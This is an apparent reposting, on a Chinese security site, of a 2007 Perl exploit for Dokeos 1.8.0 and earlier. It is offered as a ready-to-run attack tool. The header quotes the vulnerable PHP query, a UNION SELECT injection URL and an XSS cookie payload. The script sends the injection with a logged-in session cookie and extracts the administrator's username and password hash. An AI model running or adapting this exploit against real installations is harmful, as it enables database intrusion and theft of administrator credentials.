首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Dokeos <= 1.8.0 (my_progress.php course) Remote SQL Injection Exploit
来源:http://www.w4ck1ng.com 作者:Silentz 发布时间:2007-05-25  
#!/usr/bin/perl -w

#################################################################################
#                                        #
#                    Dokeos <= 1.8.0 SQL Injection Exploit            #
#                                        #
# Discovered by: Silentz                            #
# Payload: Admin Username & Hash Retrieval                    #
# Website: http://www.w4ck1ng.com                        #
#                                         #
# Vulnerable Code (my_progress.php):                         #
#                                        #
#    if(isset($_GET['course'])) {$sqlInfosCourse = "SELECT course.code,    #
#  course.title,course.db_name,CONCAT(user.firstname,' ',user.lastname ,' / ',  #
#  user.email) as tutor_infos FROM $tbl_user as user,$tbl_course as course INNER#
#  JOIN $tbl_session_course as sessionCourse ON sessionCourse.course_code =     #
#  course.code WHERE sessionCourse.id_coach = user.user_id AND course.code=     #
#  '".$_GET['course']."'";                           #
#                                        #
#                                       #
# PoC: http://victim.com/dokeos/main/auth/my_progress.php?course=-999'         #
#      UNION SELECT 0,password,0,username FROM user where user_id = '1'/*    #
#                                        #
#                                         #
# Subject To: magic_quotes_gpc set to off & have an already existant         #
#             student/teacher account                        #
#                                        #
# GoogleDork: Get your own!                            #
# Shoutz: The entire w4ck1ng community                        #
#                                        #
# Notes: To obtain SESSION_ID field you can log on and XSS yourself, like so:   #
#                                        #
#     http://victim.com/dokeos/main/inc/lib/fckeditor/editor/plugins/    #
#     ImageManager/editor.php?img="><script>alert(document.cookie)</script>    #
#                                        #
#     Also, the amount of XSS vulnerabilites in this application is truely    #
#     unbelievable.                                #
#                                        #
#################################################################################

use LWP::UserAgent;
if (@ARGV < 2){
print "-------------------------------------------------------------------------\r\n";
print "                  Dokeos <= 1.8.0 SQL Injection Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "Usage: w4ck1ng_dokeos.pl [PATH] [SESSION_ID]\r\n\r\n";
print "[PATH] = Path where Dokeos is located\r\n";
print "[SESSION_ID] = Session identifier of logged on user\r\n\r\n";
print "e.g. w4ck1ng_dokeos.pl http://victim.com/dokeos/ cjjjauie95inbmo5fim8m93vo1\r\n";
print "-------------------------------------------------------------------------\r\n";
print "                     http://www.w4ck1ng.com\r\n ";
print "                            ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
exit();
}

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$cookie = "$ARGV[1];";
$host = $ARGV[0] . "main/auth/my_progress.php?course=-999' UNION SELECT 0,password,0,username FROM user where user_id = '1'/*";

my @cookie = ('Cookie' => "dk_sid=$cookie;");
my $res = $b->get($host, @cookie);

$answer = $res->content;
if ($answer =~ / - Coach : (.*?)<\/strong>/){
print "-------------------------------------------------------------------------\r\n";
print "                  Dokeos <= 1.8.0 SQL Injection Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "[+] Admin User : $1\n";
}

if ($answer =~/<strong>([0-9a-fA-F]{32}) - Coach :/){
print "[+] Admin Hash : $1\n";
print "-------------------------------------------------------------------------\r\n";
print "                      http://www.w4ck1ng.com\r\n";
print "                            ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
}

else {
  print "\nExploit Failed...\n";
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·LeadTools ISIS Control (ltisi1
·MagicISO <= 5.4 (build239) .cu
·KSign KSignSWAT <= 2.0.3.3 Act
·Microsoft Visual Basic 6.0 Pro
·Virtual CD 9.0.0.2 (vc9api.DLL
·Microsoft Visual Basic 6.0 Pro
·Pegasus ImagN ActiveX Control
·UltraISO <= 8.6.2.2011 (Cue/Bi
·Dokeos <= 1.6.5 (courseLog.php
·Microsoft IIS 6.0 (/AUX/.aspx)
·cpCommerce <= 1.1.0 (category.
·LeadTools Raster Variant (LTRV
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved